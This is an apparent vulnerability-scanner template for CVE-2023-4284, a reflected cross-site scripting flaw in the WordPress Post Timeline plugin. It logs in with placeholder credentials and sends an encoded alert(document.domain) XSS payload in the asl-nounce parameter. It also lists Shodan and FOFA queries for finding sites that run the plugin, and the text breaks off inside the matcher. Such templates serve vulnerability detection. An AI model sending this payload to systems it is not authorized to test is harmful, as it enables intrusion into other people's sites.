id: CVE-2023-4284

info:
  name: WordPress Post Timeline Plugin < 2.2.6 - Cross-Site Scripting
  author: ritikchaddha
  severity: high
  description: |
    The Post Timeline WordPress plugin before version 2.2.6 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape an invalid nonce before outputting it back in an AJAX response, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context.
  impact: |
    Authenticated attackers can inject malicious JavaScript through an invalid nonce parameter in AJAX responses to execute code in administrator browsers and potentially hijack WordPress sites.
  remediation: |
    Update the Post Timeline plugin to version 2.2.6 or later, which properly sanitizes and escapes the nonce parameter in AJAX responses.
  reference:
    - https://wpscan.com/vulnerability/1c126869-0afa-456f-94cc-10334964e5f9
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4284
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
    cvss-score: 7.1
    cve-id: CVE-2023-4284
    cwe-id: CWE-79
    epss-score: 0.00709
    epss-percentile: 0.48856
    cpe: cpe:2.3:a:agilelogix:post_timeline:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: agilelogix
    product: post-timeline
    shodan-query: http.html:"wp-content/plugins/post-timeline/"
    fofa-query: body="wp-content/plugins/post-timeline/"
  tags: cve,cve2023,wordpress,wp,wp-plugin,xss,post-timeline,authenticated,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - 'post-timeline'
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin-ajax.php?action=ptl_ajax_handler&asl-nounce=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '